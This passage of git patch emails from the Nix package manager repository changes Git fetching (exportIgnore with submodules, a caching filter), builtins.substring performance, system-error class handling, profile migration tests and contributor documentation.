b/doc/manual/rl-next/git-fetcher.md new file mode 100644 index 000000000..54c0d216d --- /dev/null +++ b/doc/manual/rl-next/git-fetcher.md @@ -0,0 +1,18 @@ +--- +synopsis: "Nix now uses `libgit2` for Git fetching" +prs: + - 9240 + - 9241 + - 9258 + - 9480 +issues: + - 5313 +--- + +Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. +The existing implementation based on the Git CLI had issues regarding reproducibility and performance. 
+ +Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. + +Known issues: +- The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. From 692e9197bc91f874ec30f839b1ae6d1beefa1eeb Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 5 Jan 2024 19:49:39 +0100 Subject: [PATCH 237/654] fetchTree: Disallow combination of submodules and exportIgnore for now --- src/libexpr/primops/fetchTree.cc | 8 +++----- src/libfetchers/git.cc | 11 +++++++++++ tests/functional/fetchGitSubmodules.sh | 26 ++++++++++++++++++-------- 3 files changed, 32 insertions(+), 13 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 7a4725334..4d22ca01e 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -1,3 +1,4 @@ +#include "libfetchers/attrs.hh" #include "primops.hh" #include "eval-inline.hh" #include "eval-settings.hh" @@ -139,9 +140,7 @@ static void fetchTree( state.symbols[attr.name], showType(*attr.value))); } - if (params.isFetchGit && !attrs.contains("exportIgnore")) { - // Default value; user attrs are assigned later. 
- // FIXME: exportIgnore := !submodules + if (params.isFetchGit && !attrs.contains("exportIgnore") && (!attrs.contains("submodules") || !*fetchers::maybeGetBoolAttr(attrs, "submodules"))) { attrs.emplace("exportIgnore", Explicit{true}); } @@ -162,8 +161,7 @@ static void fetchTree( fetchers::Attrs attrs; attrs.emplace("type", "git"); attrs.emplace("url", fixGitURL(url)); - if (!attrs.contains("exportIgnore")) { - // FIXME: exportIgnore := !submodules + if (!attrs.contains("exportIgnore") && (!attrs.contains("submodules") || !*fetchers::maybeGetBoolAttr(attrs, "submodules"))) { attrs.emplace("exportIgnore", Explicit{true}); } input = fetchers::Input::fromAttrs(std::move(attrs)); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 10c0aef97..6ecb7a4ea 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -1,3 +1,4 @@ +#include "error.hh" #include "fetchers.hh" #include "users.hh" #include "cache.hh" @@ -739,6 +740,16 @@ struct GitInputScheme : InputScheme auto repoInfo = getRepoInfo(input); + if (getExportIgnoreAttr(input) + && getSubmodulesAttr(input)) { + /* In this situation, we don't have a git CLI behavior that we can copy. + `git archive` does not support submodules, so it is unclear whether + rules from the parent should affect the submodule or not. + When git may eventually implement this, we need Nix to match its + behavior. */ + throw UnimplementedError("exportIgnore and submodules are not supported together yet"); + } + auto [accessor, final] = input.getRef() || input.getRev() || !repoInfo.isLocal ? 
getAccessorFromCommit(store, repoInfo, std::move(input)) diff --git a/tests/functional/fetchGitSubmodules.sh b/tests/functional/fetchGitSubmodules.sh index 1b425820e..cd180815d 100644 --- a/tests/functional/fetchGitSubmodules.sh +++ b/tests/functional/fetchGitSubmodules.sh @@ -124,12 +124,16 @@ git -C $rootRepo/sub config user.email "foobar@example.com" git -C $rootRepo/sub config user.name "Foobar" echo "/exclude-from-root export-ignore" >> $rootRepo/.gitattributes +# TBD possible semantics for submodules + exportIgnore +# echo "/sub/exclude-deep export-ignore" >> $rootRepo/.gitattributes echo nope > $rootRepo/exclude-from-root git -C $rootRepo add .gitattributes exclude-from-root git -C $rootRepo commit -m "Add export-ignore" echo "/exclude-from-sub export-ignore" >> $rootRepo/sub/.gitattributes echo nope > $rootRepo/sub/exclude-from-sub +# TBD possible semantics for submodules + exportIgnore +# echo aye > $rootRepo/sub/exclude-from-root git -C $rootRepo/sub add .gitattributes exclude-from-sub git -C $rootRepo/sub commit -m "Add export-ignore (sub)" @@ -138,15 +142,21 @@ git -C $rootRepo commit -m "Update submodule" git -C $rootRepo status -# exportIgnore can be used with submodules -pathWithExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = true; }).outPath") -# find $pathWithExportIgnore -# git -C $rootRepo archive --format=tar HEAD | tar -t -# cp -a $rootRepo /tmp/rootRepo +# # TBD: not supported yet, because semantics are undecided and current implementation leaks rules from the root to submodules +# # exportIgnore can be used with submodules +# pathWithExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = true; }).outPath") +# # find $pathWithExportIgnore +# # git -C $rootRepo archive --format=tar HEAD | tar -t +# # cp -a $rootRepo /tmp/rootRepo + +# [[ -e $pathWithExportIgnore/sub/content ]] +# [[ ! 
-e $pathWithExportIgnore/exclude-from-root ]] +# [[ ! -e $pathWithExportIgnore/sub/exclude-from-sub ]] +# TBD possible semantics for submodules + exportIgnore +# # root .gitattribute has no power across submodule boundary +# [[ -e $pathWithExportIgnore/sub/exclude-from-root ]] +# [[ -e $pathWithExportIgnore/sub/exclude-deep ]] -[[ -e $pathWithExportIgnore/sub/content ]] -[[ ! -e $pathWithExportIgnore/exclude-from-root ]] -[[ ! -e $pathWithExportIgnore/sub/exclude-from-sub ]] # exportIgnore can be explicitly disabled with submodules pathWithoutExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = false; }).outPath") From 469cf263c7d1b7991a9122b76b827f3d65a02301 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 14:02:58 +0100 Subject: [PATCH 238/654] Format --- src/libfetchers/git-utils.cc | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index cd65e0fda..b416c3b52 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -701,7 +701,8 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { } } - bool isExportIgnored(const CanonPath & path) { + bool isExportIgnored(const CanonPath & path) + { const char *exportIgnoreEntry = nullptr; // GIT_ATTR_CHECK_INDEX_ONLY: @@ -721,7 +722,8 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { } } - bool isAllowed(const CanonPath & path) override { + bool isAllowed(const CanonPath & path) override + { return !isExportIgnored(path); } From f68ad5acbb74c32d7ae6019bc17931940456603a Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 16:05:36 +0100 Subject: [PATCH 239/654] fetchTree/git: Don't expose exportIgnore attr --- src/libexpr/primops/fetchTree.cc | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 4d22ca01e..7251cbbbe 
100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -40,10 +40,6 @@ void emitTreeAttrs( attrs.alloc("submodules").mkBool( fetchers::maybeGetBoolAttr(input.attrs, "submodules").value_or(false)); - if (input.getType() == "git") - attrs.alloc("exportIgnore").mkBool( - fetchers::maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false)); - if (!forceDirty) { if (auto rev = input.getRev()) { From 8c7e2ed77c3c14f8a7c82ab6ab7b20ebcfb943a0 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 16:21:07 +0100 Subject: [PATCH 240/654] Update release notes --- doc/manual/rl-next/nix-profile-names.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/doc/manual/rl-next/nix-profile-names.md b/doc/manual/rl-next/nix-profile-names.md index f5953bd72..b7ad4b5d7 100644 --- a/doc/manual/rl-next/nix-profile-names.md +++ b/doc/manual/rl-next/nix-profile-names.md @@ -3,4 +3,6 @@ synopsis: "`nix profile` now allows referring to elements by human-readable name prs: 8678 --- -[`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Indices are deprecated and will be removed in a future version. +[`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. + +**Warning**: The `manifest.nix` file used to record the contents of profiles has changed. 
Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. From 72560f7bbef2ab3c02b8ca040fe084328bdd5fbe Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 16:33:15 +0100 Subject: [PATCH 241/654] Add profile migration test --- tests/functional/nix-profile.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 003af5174..6f304bd9a 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -193,3 +193,12 @@ nix profile install $flake2Dir --priority 0 clearProfiles nix profile install $(nix build $flake1Dir --no-link --print-out-paths) expect 1 nix profile install --impure --expr "(builtins.getFlake ''$flake2Dir'').packages.$system.default" + +# Test upgrading from profile version 2. +clearProfiles +mkdir -p $TEST_ROOT/import-profile +outPath=$(nix build --no-link --print-out-paths $flake1Dir/flake.nix^out) +printf '{ "version": 2, "elements": [ { "active": true, "attrPath": "legacyPackages.x86_64-linux.hello", "originalUrl": "flake:nixpkgs", "outputs": null, "priority": 5, "storePaths": [ "%s" ], "url": "github:NixOS/nixpkgs/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" } ] }' "$outPath" > $TEST_ROOT/import-profile/manifest.json +nix build --profile $TEST_HOME/.nix-profile $(nix store add-path $TEST_ROOT/import-profile) +nix profile list | grep -A4 'Name:.*hello' | grep "Store paths:.*$outPath" +nix profile remove hello 2>&1 | grep 'removed 1 packages, kept 0 packages' From d80c582b783e4c189432a2afd383be39cc09f17c Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 17:16:59 +0100 Subject: [PATCH 242/654] libfetchers: Add CachingFilteringInputAccessor Co-authored-by: Eelco Dolstra --- src/libfetchers/filtering-input-accessor.cc | 9 +++++++++ src/libfetchers/filtering-input-accessor.hh | 14 ++++++++++++++ 2 files changed, 23 
insertions(+) diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc index 5ae416fd3..581ce3c1d 100644 --- a/src/libfetchers/filtering-input-accessor.cc +++ b/src/libfetchers/filtering-input-accessor.cc @@ -80,4 +80,13 @@ ref AllowListInputAccessor::create( return make_ref(next, std::move(allowedPaths), std::move(makeNotAllowedError)); } +bool CachingFilteringInputAccessor::isAllowed(const CanonPath & path) +{ + auto i = cache.find(path); + if (i != cache.end()) return i->second; + auto res = isAllowedUncached(path); + cache.emplace(path, res); + return res; +} + } diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index 2e2495c78..8a9b206ee 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -71,4 +71,18 @@ struct AllowListInputAccessor : public FilteringInputAccessor using FilteringInputAccessor::FilteringInputAccessor; }; +/** + * A wrapping `InputAccessor` mix-in where `isAllowed()` caches the result of virtual `isAllowedUncached()`. 
+ */ +struct CachingFilteringInputAccessor : FilteringInputAccessor +{ + std::map cache; + + using FilteringInputAccessor::FilteringInputAccessor; + + bool isAllowed(const CanonPath & path) override; + + virtual bool isAllowedUncached(const CanonPath & path) = 0; +}; + } From 274d887feee7e8bc3d4a7e6c5087fbe5aec4fd4e Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 17:18:56 +0100 Subject: [PATCH 243/654] fetchTree/git: Cache export-ignore filter --- src/libfetchers/git-utils.cc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index b416c3b52..bfc7059fe 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -660,12 +660,12 @@ struct GitInputAccessor : InputAccessor } }; -struct GitExportIgnoreInputAccessor : FilteringInputAccessor { +struct GitExportIgnoreInputAccessor : CachingFilteringInputAccessor { ref repo; std::optional rev; GitExportIgnoreInputAccessor(ref repo, ref next, std::optional rev) - : FilteringInputAccessor(next, [&](const CanonPath & path) { + : CachingFilteringInputAccessor(next, [&](const CanonPath & path) { return RestrictedPathError(fmt("'%s' does not exist because it was fetched with exportIgnore enabled", path)); }) , repo(repo) @@ -722,7 +722,7 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { } } - bool isAllowed(const CanonPath & path) override + bool isAllowedUncached(const CanonPath & path) override { return !isExportIgnored(path); } From 25c889baacd6a8b9b66ce4776ec729a40e39cf77 Mon Sep 17 00:00:00 2001 From: Mel Zuser Date: Thu, 11 Jan 2024 14:40:54 -0800 Subject: [PATCH 244/654] Fix performance of builtins.substring for empty substrings When returning a 0-length substring, avoid calling coerceToString, since it returns a string_view with the string's length, which is expensive to compute for large strings. 
--- src/libexpr/primops.cc | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index ee07e5568..c08aea898 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -3712,9 +3712,6 @@ static RegisterPrimOp primop_toString({ static void prim_substring(EvalState & state, const PosIdx pos, Value * * args, Value & v) { int start = state.forceInt(*args[0], pos, "while evaluating the first argument (the start offset) passed to builtins.substring"); - int len = state.forceInt(*args[1], pos, "while evaluating the second argument (the substring length) passed to builtins.substring"); - NixStringContext context; - auto s = state.coerceToString(pos, *args[2], context, "while evaluating the third argument (the string) passed to builtins.substring"); if (start < 0) state.debugThrowLastTrace(EvalError({ @@ -3722,6 +3719,22 @@ static void prim_substring(EvalState & state, const PosIdx pos, Value * * args, .errPos = state.positions[pos] })); + + int len = state.forceInt(*args[1], pos, "while evaluating the second argument (the substring length) passed to builtins.substring"); + + // Special-case on empty substring to avoid O(n) strlen + // This allows for the use of empty substrings to efficently capture string context + if (len == 0) { + state.forceValue(*args[2], pos); + if (args[2]->type() == nString) { + v.mkString("", args[2]->context()); + return; + } + } + + NixStringContext context; + auto s = state.coerceToString(pos, *args[2], context, "while evaluating the third argument (the string) passed to builtins.substring"); + v.mkString((unsigned int) start >= s->size() ? "" : s->substr(start, len), context); } From 6208ca72093a0e05c56561dab349423f9bff069b Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 1 Dec 2023 17:03:28 -0500 Subject: [PATCH 245/654] Separate `SystemError` from `SysError` Most of this is a `catch SysError` -> `catch SystemError` sed. 
This is a rather pure-churn change I would like to get out of the way. **The intersting part is `src/libutil/error.hh`.** On Unix, we will only throw the `SysError` concrete class, which has the same constructors that `SystemError` used to have. On Windows, we will throw `WinError` *and* `SysError`. `WinError` (which will be created in a later PR), will use a `DWORD` instead of `int` error value, and `GetLastError()`, which is the Windows equivalent of the `errno` machinery. Windows will *also* use `SysError` because Window's "libc" (MSVCRT) implements the POSIX interface, and we use it too. As the docs describe, while we *throw* one of the 3 choices above (2 concrete classes or the alias), we should always *catch* `SystemError`. This ensures no matter how the implementation changes for Windows (e.g. between `SysError` and `WinError`) the catching logic stays the same and stays correct. Co-Authored-By volth Co-Authored-By Eugene Butler --- src/libcmd/repl.cc | 2 +- src/libstore/build/local-derivation-goal.cc | 4 +- src/libstore/gc.cc | 2 +- src/libstore/globals.cc | 2 +- src/libstore/keys.cc | 2 +- src/libstore/local-store.cc | 2 +- src/libstore/optimise-store.cc | 2 +- src/libstore/remote-fs-accessor.cc | 4 +- src/libutil/args.cc | 2 +- src/libutil/cgroup.cc | 2 +- src/libutil/config.cc | 2 +- src/libutil/error.hh | 42 ++++++++++++++++++--- src/libutil/file-descriptor.cc | 2 +- src/libutil/logging.cc | 2 +- src/libutil/serialise.cc | 2 +- src/libutil/util.cc | 2 +- src/nix-build/nix-build.cc | 2 +- src/nix/config-check.cc | 2 +- tests/unit/libutil/logging.cc | 6 +-- 19 files changed, 59 insertions(+), 27 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 72e3559df..918b2e53a 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -254,7 +254,7 @@ void NixRepl::mainLoop() rl_readline_name = "nix-repl"; try { createDirs(dirOf(historyFile)); - } catch (SysError & e) { + } catch (SystemError & e) { logWarning(e.info()); } #ifndef USE_READLINE 
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index b01d9e237..f85301950 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1495,7 +1495,7 @@ void LocalDerivationGoal::startDaemon() daemon::processConnection(store, from, to, NotTrusted, daemon::Recursive); debug("terminated daemon connection"); - } catch (SysError &) { + } catch (SystemError &) { ignoreException(); } }); @@ -1707,7 +1707,7 @@ void LocalDerivationGoal::runChild() try { if (drv->isBuiltin() && drv->builder == "builtin:fetchurl") netrcData = readFile(settings.netrcFile); - } catch (SysError &) { } + } catch (SystemError &) { } #if __linux__ if (useChroot) { diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 2bd3a2edc..5cbce0748 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -413,7 +413,7 @@ void LocalStore::findRuntimeRoots(Roots & roots, bool censor) auto env_end = std::sregex_iterator{}; for (auto i = std::sregex_iterator{envString.begin(), envString.end(), storePathRegex}; i != env_end; ++i) unchecked[i->str()].emplace(envFile); - } catch (SysError & e) { + } catch (SystemError & e) { if (errno == ENOENT || errno == EACCES || errno == ESRCH) continue; throw; diff --git a/src/libstore/globals.cc b/src/libstore/globals.cc index 50584e06c..d22ae4ca0 100644 --- a/src/libstore/globals.cc +++ b/src/libstore/globals.cc @@ -118,7 +118,7 @@ void loadConfFile() try { std::string contents = readFile(path); globalConfig.applyConfig(contents, path); - } catch (SysError &) { } + } catch (SystemError &) { } }; applyConfigFile(settings.nixConfDir + "/nix.conf"); diff --git a/src/libstore/keys.cc b/src/libstore/keys.cc index 2cc50970f..70478e7ad 100644 --- a/src/libstore/keys.cc +++ b/src/libstore/keys.cc @@ -19,7 +19,7 @@ PublicKeys getDefaultPublicKeys() try { SecretKey secretKey(readFile(secretKeyFile)); publicKeys.emplace(secretKey.name, secretKey.toPublicKey()); - } catch 
(SysError & e) { + } catch (SystemError & e) { /* Ignore unreadable key files. That's normal in a multi-user installation. */ } diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 0f3c37c8a..5a399c8be 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -276,7 +276,7 @@ LocalStore::LocalStore(const Params & params) [[gnu::unused]] auto res2 = ftruncate(fd.get(), settings.reservedSize); } } - } catch (SysError & e) { /* don't care about errors */ + } catch (SystemError & e) { /* don't care about errors */ } /* Acquire the big fat lock in shared mode to make sure that no diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index a494e6ecc..78e4f6d86 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -242,7 +242,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, /* Atomically replace the old file with the new hard link. */ try { renameFile(tempLink, path); - } catch (SysError & e) { + } catch (SystemError & e) { if (unlink(tempLink.c_str()) == -1) printError("unable to unlink '%1%'", tempLink); if (errno == EMLINK) { diff --git a/src/libstore/remote-fs-accessor.cc b/src/libstore/remote-fs-accessor.cc index 03e57a565..b44edfe89 100644 --- a/src/libstore/remote-fs-accessor.cc +++ b/src/libstore/remote-fs-accessor.cc @@ -87,13 +87,13 @@ std::pair, CanonPath> RemoteFSAccessor::fetch(const CanonPat nars.emplace(storePath.hashPart(), narAccessor); return {narAccessor, restPath}; - } catch (SysError &) { } + } catch (SystemError &) { } try { auto narAccessor = makeNarAccessor(nix::readFile(cacheFile)); nars.emplace(storePath.hashPart(), narAccessor); return {narAccessor, restPath}; - } catch (SysError &) { } + } catch (SystemError &) { } } StringSink sink; diff --git a/src/libutil/args.cc b/src/libutil/args.cc index e2668c673..5187e7396 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -304,7 +304,7 @@ void 
RootArgs::parseCmdline(const Strings & _cmdline, bool allowShebang) for (auto pos = savedArgs.begin(); pos != savedArgs.end();pos++) cmdline.push_back(*pos); } - } catch (SysError &) { } + } catch (SystemError &) { } } for (auto pos = cmdline.begin(); pos != cmdline.end(); ) { diff --git a/src/libutil/cgroup.cc b/src/libutil/cgroup.cc index 4c2bf31ff..de83b5ad1 100644 --- a/src/libutil/cgroup.cc +++ b/src/libutil/cgroup.cc @@ -95,7 +95,7 @@ static CgroupStats destroyCgroup(const Path & cgroup, bool returnStats) using namespace std::string_literals; warn("killing stray builder process %d (%s)...", pid, trim(replaceStrings(cmdline, "\0"s, " "))); - } catch (SysError &) { + } catch (SystemError &) { } } // FIXME: pid wraparound diff --git a/src/libutil/config.cc b/src/libutil/config.cc index a3310f4ec..37f5b50c7 100644 --- a/src/libutil/config.cc +++ b/src/libutil/config.cc @@ -124,7 +124,7 @@ static void applyConfigInner(const std::string & contents, const std::string & p try { std::string includedContents = readFile(path); applyConfigInner(includedContents, p, parsedContents); - } catch (SysError &) { + } catch (SystemError &) { // TODO: Do we actually want to ignore this? Or is it better to fail? } } else if (!ignoreMissing) { diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 234cbe1f6..764fac1ce 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -178,20 +178,50 @@ MakeError(Error, BaseError); MakeError(UsageError, Error); MakeError(UnimplementedError, Error); -class SysError : public Error +/** + * To use in catch-blocks. + */ +MakeError(SystemError, Error); + +/** + * POSIX system error, created using `errno`, `strerror` friends. + * + * Throw this, but prefer not to catch this, and catch `SystemError` + * instead. This allows implementations to freely switch between this + * and `WinError` without breaking catch blocks. + * + * However, it is permissible to catch this and rethrow so long as + * certain conditions are not met (e.g. 
to catch only if `errNo = + * EFooBar`). In that case, try to also catch the equivalent `WinError` + * code. + * + * @todo Rename this to `PosixError` or similar. At this point Windows + * support is too WIP to justify the code churn, but if it is finished + * then a better identifier becomes moe worth it. + */ +class SysError : public SystemError { public: int errNo; + /** + * Construct using the explicitly-provided error number. `strerror` + * will be used to try to add additional information to the message. + */ template - SysError(int errNo_, const Args & ... args) - : Error("") + SysError(int errNo, const Args & ... args) + : SystemError(""), errNo(errNo) { - errNo = errNo_; auto hf = hintfmt(args...); err.msg = hintfmt("%1%: %2%", normaltxt(hf.str()), strerror(errNo)); } + /** + * Construct using the ambient `errno`. + * + * Be sure to not perform another `errno`-modifying operation before + * calling this constructor! + */ template SysError(const Args & ... args) : SysError(errno, args ...) @@ -199,7 +229,9 @@ public: } }; -/** Throw an exception for the purpose of checking that exception handling works; see 'initLibUtil()'. +/** + * Throw an exception for the purpose of checking that exception + * handling works; see 'initLibUtil()'. */ void throwExceptionSelfCheck(); diff --git a/src/libutil/file-descriptor.cc b/src/libutil/file-descriptor.cc index 38dd70c8e..692be3383 100644 --- a/src/libutil/file-descriptor.cc +++ b/src/libutil/file-descriptor.cc @@ -231,7 +231,7 @@ void closeMostFDs(const std::set & exceptions) } } return; - } catch (SysError &) { + } catch (SystemError &) { } #endif diff --git a/src/libutil/logging.cc b/src/libutil/logging.cc index 183aee2dc..d68ddacc0 100644 --- a/src/libutil/logging.cc +++ b/src/libutil/logging.cc @@ -116,7 +116,7 @@ void writeToStderr(std::string_view s) { try { writeFull(STDERR_FILENO, s, false); - } catch (SysError & e) { + } catch (SystemError & e) { /* Ignore failing writes to stderr. 
We need to ignore write errors to ensure that cleanup code that logs to stderr runs to completion if the other side of stderr has been closed diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index 76b378e18..316105603 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -53,7 +53,7 @@ void FdSink::writeUnbuffered(std::string_view data) written += data.size(); try { writeFull(fd, data); - } catch (SysError & e) { + } catch (SystemError & e) { _good = false; throw; } diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 7b4b1d031..b23362b5c 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -20,7 +20,7 @@ void initLibUtil() { // When exception handling fails, the message tends to be printed by the // C++ runtime, followed by an abort. // For example on macOS we might see an error such as - // libc++abi: terminating with uncaught exception of type nix::SysError: error: C++ exception handling is broken. This would appear to be a problem with the way Nix was compiled and/or linked and/or loaded. + // libc++abi: terminating with uncaught exception of type nix::SystemError: error: C++ exception handling is broken. This would appear to be a problem with the way Nix was compiled and/or linked and/or loaded. 
bool caught = false; try { throwExceptionSelfCheck(); diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index ee2addb72..1ad4b387c 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -148,7 +148,7 @@ static void main_nix_build(int argc, char * * argv) args.push_back(word); } } - } catch (SysError &) { } + } catch (SystemError &) { } } struct MyArgs : LegacyArgs, MixEvalArgs diff --git a/src/nix/config-check.cc b/src/nix/config-check.cc index 410feca2f..8d4717e15 100644 --- a/src/nix/config-check.cc +++ b/src/nix/config-check.cc @@ -107,7 +107,7 @@ struct CmdConfigCheck : StoreCommand if (profileDir.find("/profiles/") == std::string::npos) dirs.insert(dir); } - } catch (SysError &) {} + } catch (SystemError &) {} } if (!dirs.empty()) { diff --git a/tests/unit/libutil/logging.cc b/tests/unit/libutil/logging.cc index c6dfe63d3..8950a26d4 100644 --- a/tests/unit/libutil/logging.cc +++ b/tests/unit/libutil/logging.cc @@ -73,7 +73,7 @@ namespace nix { } - TEST(logEI, picksUpSysErrorExitCode) { + TEST(logEI, picksUpSystemErrorExitCode) { MakeError(TestError, Error); ErrorInfo::programName = std::optional("error-unit-test"); @@ -81,12 +81,12 @@ namespace nix { try { auto x = readFile(-1); } - catch (SysError &e) { + catch (SystemError &e) { testing::internal::CaptureStderr(); logError(e.info()); auto str = testing::internal::GetCapturedStderr(); - ASSERT_STREQ(str.c_str(), "\x1B[31;1merror:\x1B[0m\x1B[34;1m --- SysError --- error-unit-test\x1B[0m\nstatting file: \x1B[33;1mBad file descriptor\x1B[0m\n"); + ASSERT_STREQ(str.c_str(), "\x1B[31;1merror:\x1B[0m\x1B[34;1m --- SystemError --- error-unit-test\x1B[0m\nstatting file: \x1B[33;1mBad file descriptor\x1B[0m\n"); } } From 1996105e91d8d2022869c4e66c0a0734e363052b Mon Sep 17 00:00:00 2001 From: Mel Zuser Date: Fri, 12 Jan 2024 08:57:08 -0800 Subject: [PATCH 246/654] added test for empty substring special case --- tests/functional/lang/eval-okay-substring-context.exp | 1 + 
tests/functional/lang/eval-okay-substring-context.nix | 11 +++++++++++ 2 files changed, 12 insertions(+) create mode 100644 tests/functional/lang/eval-okay-substring-context.exp create mode 100644 tests/functional/lang/eval-okay-substring-context.nix diff --git a/tests/functional/lang/eval-okay-substring-context.exp b/tests/functional/lang/eval-okay-substring-context.exp new file mode 100644 index 000000000..2fe7f71fa --- /dev/null +++ b/tests/functional/lang/eval-okay-substring-context.exp @@ -0,0 +1 @@ +"okay" diff --git a/tests/functional/lang/eval-okay-substring-context.nix b/tests/functional/lang/eval-okay-substring-context.nix new file mode 100644 index 000000000..d0ef70d4e --- /dev/null +++ b/tests/functional/lang/eval-okay-substring-context.nix @@ -0,0 +1,11 @@ +with builtins; + +let + + s = "${builtins.derivation { name = "test"; builder = "/bin/sh"; system = "x86_64-linux"; }}"; + +in + +if getContext s == getContext "${substring 0 0 s + unsafeDiscardStringContext s}" +then "okay" +else throw "empty substring should preserve context" From b29be1ff57e6e358b2925012a13d7d4a0312560e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 12 Jan 2024 10:01:55 -0800 Subject: [PATCH 247/654] Document unit tests in hacking.md --- doc/manual/src/contributing/hacking.md | 5 ++++- doc/manual/src/contributing/testing.md | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9a03ac9b6..0fa59e891 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -51,11 +51,14 @@ To install it in `$(pwd)/outputs` and test it: ```console [nix-shell]$ make install -[nix-shell]$ make installcheck -j $NIX_BUILD_CORES +[nix-shell]$ make installcheck check -j $NIX_BUILD_CORES [nix-shell]$ nix --version nix (Nix) 2.12 ``` +For more information on running and filtering tests, see +[`testing.md`](./testing.md). 
